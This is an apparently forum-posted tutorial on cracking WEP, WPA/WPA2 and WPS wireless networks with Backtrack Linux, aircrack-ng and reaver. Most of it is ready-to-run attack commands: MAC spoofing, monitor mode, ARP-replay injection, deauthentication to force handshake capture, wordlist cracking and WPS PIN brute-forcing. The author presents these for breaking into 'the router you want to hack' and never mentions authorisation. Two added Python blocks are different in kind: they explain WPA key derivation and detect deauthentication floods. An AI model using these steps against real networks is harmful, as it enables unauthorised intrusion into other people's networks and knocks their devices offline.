27.04.2015

Cracking WPA/WPA2

What do I need for cracking wireless networks?
Backtrack Linux (http://www.backtrack-linux.org/)
Brain
Computer
Commands
Wireless card that supports packet injection
Wordlist/s for WPA/WPA2 encrypted networks
Which wireless cards are supported?
Is my wireless card compatible?
http://www.aircrack-ng.org/doku.php?id=compatible_cards
Which is the best card to buy?
http://www.aircrack-ng.org/doku.php?id=c…ard_to_buy
I recommend Alfa wireless cards:
http://www.alfa.com.tw/products_list.php?pc=34
I use the following products without having any trouble:
AWUS036NH
AWUS036NHA
Where can I get wordlists?
InsidePro
Packetstormsecurity
Skullsecurity
Alphabetic and numerical wordlist generator


How do I install my Backtrack Linux ISO to a USB drive/stick?
1. Open up http://www.google.com/
2. Search for ‘UNetbootin’
3. Download the program
4. Connect your USB drive/stick to your computer
5. Open the executable; you don't have to install it because it is a portable version.
6. Follow the options in this picture
[Image: A4GEGbH.png]
7. Select your Backtrack Linux ISO and your USB drive and press ‘OK’
How do I boot the Backtrack Linux operating system?
1. Turn off your computer
2. Connect your USB drive/stick to your computer
3. Turn on your computer and enter the ‘Boot Menu’ or ‘BIOS’ by pressing F1, F2, DEL, ESC or F10
4. Change the boot priority to the USB drive/stick
5. Save the BIOS settings and reboot if necessary
6. Boot Backtrack Linux
7. When your screen freezes/stands still, enter the following on the command line: startx (this command starts the graphical interface, the GUI)
[Image: 8vAttE6.png]
8. You have finally booted Backtrack Linux; you're ready for cracking wireless networks now
How do I change the MAC address of my wireless card?
1. Open up the Terminal/Console/Command Prompt
[Image: IJ2faKc.png]
2. Type in ‘airmon-ng’ to see your installed supported wireless card/s
Code:
airmon-ng
[Image: t6tyJmU.png]
3. Type in ‘ifconfig <interface> down’ and press enter.
Code:
ifconfig <interface> down
Code:
ifconfig wlan0 down
4. Type in ‘macchanger --mac 00:11:22:33:44:55 <interface>’ and press enter.
Code:
macchanger --mac 00:11:22:33:44:55 <interface>
Code:
macchanger --mac 00:11:22:33:44:55 wlan0
5. Type in ‘ifconfig <interface> up’ and press enter.
Code:
ifconfig <interface> up
Code:
ifconfig wlan0 up
[Image: UCpH233.png]
Alternative way (random MAC address):
1. Type in ‘ifconfig’ and press enter.
Code:
ifconfig
2. Type in ‘ifconfig <interface> down’ and press enter.
Code:
ifconfig <interface> down
Code:
ifconfig wlan0 down
3. Type in ‘macchanger -r <interface>’ and press enter.
Code:
macchanger -r <interface>
Code:
macchanger -r wlan0
4. Type in ‘ifconfig <interface> up’ and press enter.
Code:
ifconfig <interface> up
Code:
ifconfig wlan0 up
How do I monitor/search for wireless networks in my area?
1. Type in ‘airmon-ng’ and press enter.
Code:
airmon-ng
2. Type in ‘airmon-ng start <interface>’ and press enter.
Code:
airmon-ng start <interface>
Code:
airmon-ng start wlan0
3. Type in ‘airodump-ng <interface>’ and press enter.
Code:
airodump-ng <interface>
Code:
airodump-ng mon0
[Image: HsF0SxL.png]
[Image: yB7vHfu.png]
Security difference between the wireless encryption types:
WEP (Wired Equivalent Privacy): easiest and weakest encryption, needs no wordlist to crack
WPA (Wi-Fi Protected Access): intermediate and insecure encryption, needs a wordlist to crack
WPA2 (Wi-Fi Protected Access 2): hardest and strongest encryption, needs a wordlist to crack
Weakest to strongest: WEP < WPA < WPA2
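To see why WPA and WPA2 need a wordlist while WEP does not, here is an added example (not from the original post) that derives the WPA/WPA2-Personal pairwise master key exactly as the standard does and measures what every single guess costs; the SSIDs and candidate strings it uses are constructed.

```python
import hashlib
import time


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal pairwise master key as defined in IEEE 802.11i:
    PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID,
    4096 iterations, 256-bit output. This is what aircrack-ng must
    recompute for every wordlist entry before it can test a handshake."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def guesses_per_second(ssid: str, samples: int = 100) -> float:
    """Measure how many candidate passphrases this machine can derive
    per second on one core. Candidates are constructed throw-away values."""
    t0 = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"candidate{i}", ssid)
    return samples / (time.perf_counter() - t0)


def seconds_to_try(wordlist_entries: int, rate: float) -> float:
    """Time needed to run a wordlist of the given size at the measured rate."""
    return wordlist_entries / rate


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE"
    print(wpa_pmk("password", "IEEE").hex())
    # Same passphrase, different SSID -> different PMK: precomputed tables
    # only help against default SSIDs, and a unique SSID forces per-network work.
    print(wpa_pmk("password", "IEEE") != wpa_pmk("password", "linksys"))
    rate = guesses_per_second("linksys")
    hours = seconds_to_try(10_000_000, rate) / 3600
    print(f"{rate:,.0f} guesses/s on one core; a 10 million entry wordlist "
          f"takes about {hours:.1f} h, and a passphrase not in it is never found")
```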
WEP (Wired Equivalent Privacy) Cracking:
1. Type in ‘airmon-ng’ and press enter.
Code:
airmon-ng
2. Type in ‘airmon-ng start <interface>’ and press enter.
Code:
airmon-ng start <interface>
Code:
airmon-ng start wlan0
3. Type in ‘airodump-ng <interface>’ and press enter.
Code:
airodump-ng <interface>
Code:
airodump-ng mon0
[Image: RU2urKd.png]
4. Type in ‘airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w WEP <interface>’ and press enter.
--bssid = MAC address of the router you want to hack
-c = the channel the router you want to hack is on
-w = the name prefix of the capture file for all recorded packets
Code:
airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w WEP <interface>
Code:
airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w WEP mon0
5. Type in ‘aireplay-ng --fakeauth 0 -a <bssid> <interface>’ and press enter.
Code:
aireplay-ng --fakeauth 0 -a 00:23:69:AB:B8:38 <interface>
Code:
aireplay-ng --fakeauth 0 -a 00:23:69:AB:B8:38 mon0
6. Type in ‘aireplay-ng --arpreplay -b 00:23:69:AB:B8:38 <interface>’ and press enter.
Code:
aireplay-ng --arpreplay -b 00:23:69:AB:B8:38 <interface>
Code:
aireplay-ng --arpreplay -b 00:23:69:AB:B8:38 mon0
7. After collecting more than 30,000 #Data packets you can start cracking the capture file.
[Image: urNIXY1.png]
8. Type in ‘aircrack-ng -b <bssid> <file name>-01.cap’ and press enter.
Code:
aircrack-ng -b <bssid> <file name>-01.cap
Code:
aircrack-ng -b 00:23:69:AB:B8:38 WEP-01.cap
WPA/WPA2 (Wi-Fi Protected Access) Cracking:
1. Type in ‘airmon-ng’ and press enter.
Code:
airmon-ng
[Image: t6tyJmU.png]
2. Bring your card/device into monitor mode: type in ‘airmon-ng start <interface>’ and press enter.
Code:
airmon-ng start <interface>
Code:
airmon-ng start wlan0
3. Search for available networks with WPA/WPA2 encryption and connected clients/users: type in ‘airodump-ng <interface>’ and press enter.
Code:
airodump-ng <interface>
Code:
airodump-ng mon0
[Image: yB7vHfu.png]
4. After you have found a network, start capturing its traffic: type in ‘airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w linksys <monitor-interface>’ and press enter.
Code:
airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w linksys <interface>
Code:
airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w linksys mon0
[Image: c0niuRy.png]
Red = target router
Green = connected target client (computer, laptop, iPhone, smartphone…)
5. Open a new console/terminal tab and get the handshake: type in ‘aireplay-ng --deauth 10 -a <bssid of access-point/router> -c <mac-address of client/user> <monitor-interface>’ and press enter.
Code:
aireplay-ng --deauth 10 -a 00:23:69:AB:B8:38 -c AC:72:89:47:D7:DB <monitor-interface>
Code:
aireplay-ng --deauth 10 -a 00:23:69:AB:B8:38 -c AC:72:89:47:D7:DB mon0
[Image: EIaqISk.png]
[Image: Mr8TdtM.png]
6. After we have found the handshake we can continue with a dictionary/wordlist attack to find the password by entering the following command: ‘aircrack-ng <filename-01.cap> -w <file path of wordlist>’ (the file path is not needed when the wordlist is saved in the home folder).
Code:
aircrack-ng <filename-01.cap> -w <file path of wordlist>
Code:
aircrack-ng linksys-01.cap -w Wordlist.lst
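From the defender's side, the handshake in step 5 is forced by a burst of deauthentication frames that carry the access point's own address as sender. The following added example (not part of the original post) flags such a burst in a simplified monitor-mode frame log; the frame tuples are constructed, and the MAC addresses reuse the placeholder values from this tutorial.

```python
from collections import defaultdict, deque

# 802.11 management-frame subtypes that tear down a client's session
DEAUTH = (0, 12)     # type 0 (management), subtype 12 = Deauthentication
DISASSOC = (0, 10)   # type 0 (management), subtype 10 = Disassociation


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """Flag any sender that emits >= threshold deauth/disassoc frames within
    `window` seconds. A real AP sends these rarely; a burst is an attack signal.

    frames: iterable of (timestamp_s, frame_type, subtype, sender_mac, receiver_mac),
            a simplified view of what a monitor-mode capture yields.
    Returns a list of (sender_mac, first_alert_timestamp, frames_in_window).
    """
    recent = defaultdict(deque)   # sender -> timestamps of recent deauth/disassoc frames
    alerts, alerted = [], set()
    for ts, ftype, subtype, sender, _receiver in sorted(frames, key=lambda f: f[0]):
        if (ftype, subtype) not in (DEAUTH, DISASSOC):
            continue
        q = recent[sender]
        q.append(ts)
        while q and ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and sender not in alerted:
            alerts.append((sender, ts, len(q)))
            alerted.add(sender)
    return alerts


def build_sample():
    """Constructed capture (not real data): beacons and data frames, one
    legitimate deauth from another AP, then a spoofed burst that carries the
    target AP's BSSID as sender, the pattern a deauth tool produces."""
    ap, client, other_ap = "00:23:69:AB:B8:38", "AC:72:89:47:D7:DB", "00:11:22:33:44:55"
    frames = [(0.1 * i, 0, 8, ap, "FF:FF:FF:FF:FF:FF") for i in range(50)]   # beacons
    frames += [(0.1 * i + 0.05, 2, 0, client, ap) for i in range(50)]        # data
    frames.append((2.0, 0, 12, other_ap, client))                            # lone deauth: benign
    frames += [(5.0 + 0.01 * i, 0, 12, ap, client) for i in range(20)]       # 20 deauths in 0.2 s
    return frames


if __name__ == "__main__":
    for sender, ts, n in detect_deauth_flood(build_sample()):
        print(f"ALERT: {n} deauth/disassoc frames from {sender} within 1 s (t={ts:.2f} s)")
```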
WPS (Wi-Fi Protected Setup) Cracking:
1. Bring your wireless card into monitor mode.
2. Type in ‘wash -i <interface>’ and press enter.
Code:
wash -i <interface>
Code:
wash -i mon0
3. Type in ‘reaver -i <interface> -b <BSSID> -vv’ and press enter.
Code:
reaver -i <interface> -b <BSSID> -vv
Code:
reaver -i mon0 -b 00:23:69:AB:B8:38 -vv
4. Type in ‘reaver -i <interface> -c <Channelnumber> -b <BSSID> -S -L -vv’ and press enter.
Code:
reaver -i <interface> -c <Channelnumber> -b <BSSID> -S -L -vv
Code:
reaver -i mon0 -c 11 -b 00:23:69:AB:B8:38 -S -L -vv
5. Type in ‘reaver -i <interface> -c <Channelnumber> -b <BSSID> -p <PIN> -vv’ and press enter.
Code:
reaver -i <interface> -c <Channelnumber> -b <BSSID> -p <PIN> -vv
Code:
reaver -i mon0 -c 11 -b 00:23:69:AB:B8:38 -p 12345678 -vv
(12345678 is only an example PIN)
6. If you have any troubles/problems going through these steps feel free to enter ‘reaver --help’.
Code:
reaver --help
Where are the capture files stored?
All capture files are stored in the home folder of Backtrack Linux.
You only have to open the Dolphin file manager to see your files.
[Image: zP2gSec.png]